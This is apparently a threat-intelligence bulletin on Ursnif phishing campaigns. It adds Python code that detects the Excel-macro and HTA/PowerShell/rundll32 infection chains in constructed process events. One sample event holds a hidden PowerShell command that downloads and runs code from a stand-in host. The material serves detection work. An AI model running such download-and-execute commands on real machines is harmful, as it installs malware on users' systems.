2022-05-18

Ursnif Phishing Campaigns

Industry: Financial, Government | Level: Tactical | Source: Qualys


Qualys has published an analysis of the Ursnif banking malware. The information stealer, which can harvest credentials, log keystrokes, and download additional payloads, has been a prevalent threat since 2020. Ursnif is predominantly distributed through phishing emails targeting verticals such as banking, financial services, and government agencies. In the latest wave of phishing campaigns, attackers leverage current events and impersonate government authorities to lure victims. The malicious attachment is either an Excel document or a zip archive; the infection chain differs slightly between the two scenarios, but the result is the same. In the Excel scenario, executing the Excel macro downloads a binary, which spoofs its parent PID to explorer.exe for defense evasion. In the zip scenario, the archive contains an HTA file that, when triggered, launches PowerShell to download a DLL, which is then executed with rundll32.

Anvilogic Scenario:

  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Invoke-Expression Command
  • MSHTA.exe execution
  • Query Registry
  • Rundll32 Command Line
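As an added illustration (not Qualys's or Anvilogic's own detection content), the Python below runs simplified versions of four of the use cases above over constructed Sysmon-style process-creation events that cover both delivery chains; the PIDs, image paths and command lines are made up. Because the Excel-path binary spoofs its parent to explorer.exe, the Office-child rule only fires where telemetry records the real creating process rather than the spoofed one.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One Sysmon-style process-creation record (constructed, not real telemetry)."""
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    cmdline: str

OFFICE = {"excel.exe", "winword.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "wscript.exe"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the use cases from the list above that this single event triggers."""
    child, parent = _name(ev.image), _name(ev.parent_image)
    image, cmd = ev.image.lower(), ev.cmdline.lower()
    hits = []
    # Excel path: the macro drops and runs a binary from a user-writable folder.
    if parent in OFFICE and (child in SCRIPT_HOSTS or any(d in image for d in USER_WRITABLE)):
        hits.append("Malicious Document Execution")
    # Zip/HTA path: mshta.exe running an attachment, or mshta.exe launching PowerShell.
    if (child == "mshta.exe" and any(d in cmd for d in USER_WRITABLE)) or \
       (parent == "mshta.exe" and child == "powershell.exe"):
        hits.append("MSHTA.exe execution")
    # Downloaded code handed to Invoke-Expression.
    if child == "powershell.exe" and re.search(r"\b(iex|invoke-expression)\b", cmd):
        hits.append("Invoke-Expression Command")
    # rundll32 loading the downloaded DLL from a user-writable path.
    if child == "rundll32.exe" and any(d in cmd for d in USER_WRITABLE):
        hits.append("Rundll32 Command Line")
    return hits

def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map each alerting PID to its matched use cases; events with no hits are dropped."""
    return {ev.pid: h for ev in events if (h := classify(ev))}

# Constructed sample events: both delivery chains plus Excel itself starting normally.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Program Files\Microsoft Office\EXCEL.EXE", r"C:\Windows\explorer.exe", "EXCEL.EXE invoice.xls"),
    ProcEvent(101, r"C:\Users\alice\AppData\Local\Temp\update.exe", r"C:\Program Files\Microsoft Office\EXCEL.EXE", "update.exe"),
    ProcEvent(102, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe", r"mshta.exe C:\Users\alice\Downloads\notice.hta"),
    ProcEvent(103, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\mshta.exe", "powershell -w hidden iex (new-object net.webclient).downloadstring('http://example.invalid/x')"),
    ProcEvent(104, r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,DllRegisterServer"),
]
```

Running `scan(SAMPLE_EVENTS)` flags PIDs 101 through 104 and leaves the normal Excel launch (PID 100) alone.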
